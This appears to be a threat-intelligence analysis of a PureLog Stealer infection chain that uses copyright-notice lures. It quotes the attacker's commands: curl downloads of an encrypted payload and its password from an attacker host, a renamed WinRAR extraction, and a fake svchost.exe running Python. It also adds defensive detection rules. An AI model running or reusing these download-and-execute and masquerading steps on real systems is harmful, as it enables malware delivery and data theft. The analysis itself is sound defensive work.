Copyright Lures Mask a Multi‑Stage PureLog Stealer Attack on Key Industries
The infection begins when the victim manually executes a file disguised as a legal notice:
Dokumentation über Verstöße gegen Rechte des geistigen Eigentums.exe (translating to Documentation on Intellectual Property Rights Violations.exe)
This executable launches a command interpreter:
cmd.exe /c …
The attack depends entirely on user interaction, with no exploit or vulnerability being used at this stage.
To reduce suspicion, the malware immediately opens a decoy PDF, displaying a benign-looking document while malicious actions continue in the background.
start "" ".\_document.pdf"
The decoy's purpose is to distract the user and lend an appearance of legitimacy to the actions being performed.
The malware then downloads an encrypted payload from attacker-controlled infrastructure:
curl -A "curl/meow_meow" -s -k -L "https://quickdocshare.com/DQ" -o ".\_invoice.pdf"
Key technical details include:
- Custom User-Agent: curl/meow_meow
- -s (silent mode)
- -k (ignore TLS validation)
- -L (follow redirects)
- Saved locally as _invoice.pdf
While labelled as a PDF, the file is actually an encrypted archive container.
Instead of being embedded in the malware, the archive password is retrieved dynamically from a separate endpoint:
curl -A "curl/meow_meow" -s -k -L "https://quickdocshare.com/DQ/key"
The response from this request is captured into a command-line variable (%i) and used for extraction. The malware does not contain a static, hardcoded password, making offline analysis significantly more difficult. The attacker can rotate passwords on a per‑victim basis, ensuring that each infection can be uniquely controlled or invalidated.
This design also prevents analysts from extracting the payload without active network access to the attacker’s infrastructure. Overall, the approach establishes an infrastructure‑controlled decryption model that gives the operator full remote control over when and how the payload is unlocked.
A file masquerading as a PNG image is executed:
- _FILE_2025년_재직증명서_원본.png (translating to 2025 Employment Certificate – Original)
This file is actually a renamed WinRAR executable.
The extraction command:
".\_FILE_2025년_재직증명서_원본.png" x -p"%i" ".\_invoice.pdf" "C:\Users\Public" -y
The components of this command are:
- x → Extract archive
- -p"%i" → Use dynamically retrieved password
- Output → C:\Users\Public
- -y → Overwrite automatically
This stage decrypts and extracts the next payload using legitimate archive functionality.
After successful extraction, the encrypted container is removed:
del ".\_invoice.pdf"
This reduces forensic artifacts and removes the encrypted staging file.
The working directory is then changed to the following:
cd "C:\Users\Public\Windows"
This location mimics a legitimate Windows directory structure to reduce user suspicion.
During this stage, the extracted payload is executed:
"C:\Users\Public\Windows\svchost.exe" "instructions.pdf"
The notable observations we identified during this stage include:
- The file svchost.exe is not the legitimate Windows component; it is a renamed python.exe used to execute Python scripts
- The file instructions.pdf is the obfuscated Python script used as the loader for two .NET executables.
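The command-line characteristics described across these stages (curl with a custom User-Agent and TLS validation disabled, an archiver extracting with x -p from a file named like an image, svchost.exe running outside System32, and the mimicked C:\Users\Public\Windows directory) can be turned into process-creation detection logic. The following is an added example written for this article, not tooling from the report; the events it evaluates are constructed to resemble Sysmon Event ID 1 records and are not real telemetry.

```python
import re
from typing import Callable, Dict, List

Event = Dict[str, str]  # keys: "image" (executable path) and "cmdline"

# Constructed sample events modelled on the chain described above; the
# password and file names are placeholders, not values from real telemetry.
SAMPLE_EVENTS: List[Event] = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'curl -A "curl/meow_meow" -s -k -L "https://quickdocshare.com/DQ" -o ".\\_invoice.pdf"'},
    {"image": r"C:\Users\victim\Downloads\_FILE_2025_cert.png",
     "cmdline": '".\\_FILE_2025_cert.png" x -p"PLACEHOLDER" ".\\_invoice.pdf" "C:\\Users\\Public" -y'},
    {"image": r"C:\Users\Public\Windows\svchost.exe",
     "cmdline": '"C:\\Users\\Public\\Windows\\svchost.exe" "instructions.pdf"'},
    {"image": r"C:\Windows\System32\svchost.exe",  # legitimate, must not match
     "cmdline": "C:\\Windows\\System32\\svchost.exe -k netsvcs"},
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

def curl_insecure_custom_ua(ev: Event) -> bool:
    """curl run with certificate checks disabled (-k) and an explicit User-Agent (-A)."""
    tokens = ev["cmdline"].split()
    uses_curl = re.search(r"(^|\s)curl(\.exe)?\s", ev["cmdline"], re.I) is not None
    return uses_curl and "-k" in tokens and "-A" in tokens

def archiver_with_image_extension(ev: Event) -> bool:
    """Archive extraction syntax (x -p<password>) issued by a file named like an image."""
    looks_like_image = ev["image"].lower().endswith((".png", ".jpg", ".jpeg", ".gif"))
    return looks_like_image and re.search(r"\bx\s+-p", ev["cmdline"]) is not None

def svchost_outside_system_dir(ev: Event) -> bool:
    """svchost.exe is only legitimate under System32 / SysWOW64."""
    img = ev["image"].lower()
    return img.endswith("\\svchost.exe") and not img.startswith(SYSTEM_DIRS)

def mimicked_windows_dir(ev: Event) -> bool:
    """Execution from the fake C:\\Users\\Public\\Windows tree used as staging."""
    return "\\users\\public\\windows\\" in ev["image"].lower()

RULES: Dict[str, Callable[[Event], bool]] = {
    "curl_insecure_custom_ua": curl_insecure_custom_ua,
    "archiver_with_image_extension": archiver_with_image_extension,
    "svchost_outside_system_dir": svchost_outside_system_dir,
    "mimicked_windows_dir": mimicked_windows_dir,
}

def evaluate(events: List[Event]) -> Dict[str, List[str]]:
    """Map each rule name to the command lines of the events it matched."""
    return {name: [ev["cmdline"] for ev in events if rule(ev)] for name, rule in RULES.items()}

def rules_triggered(events: List[Event]) -> int:
    """Number of distinct rules that fired; several firing together indicates the chain."""
    return sum(1 for matches in evaluate(events).values() if matches)
```

Run on real endpoint telemetry, each rule is a separate low-noise signal; correlating two or more within a short window on one host is what distinguishes this staged chain from isolated benign use of curl or WinRAR.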
We identified a second infection chain sharing the same core toolset as the originally documented one. This consists of four stages exhibiting material operational differences from the previous infection chain, which are detailed in the table below.
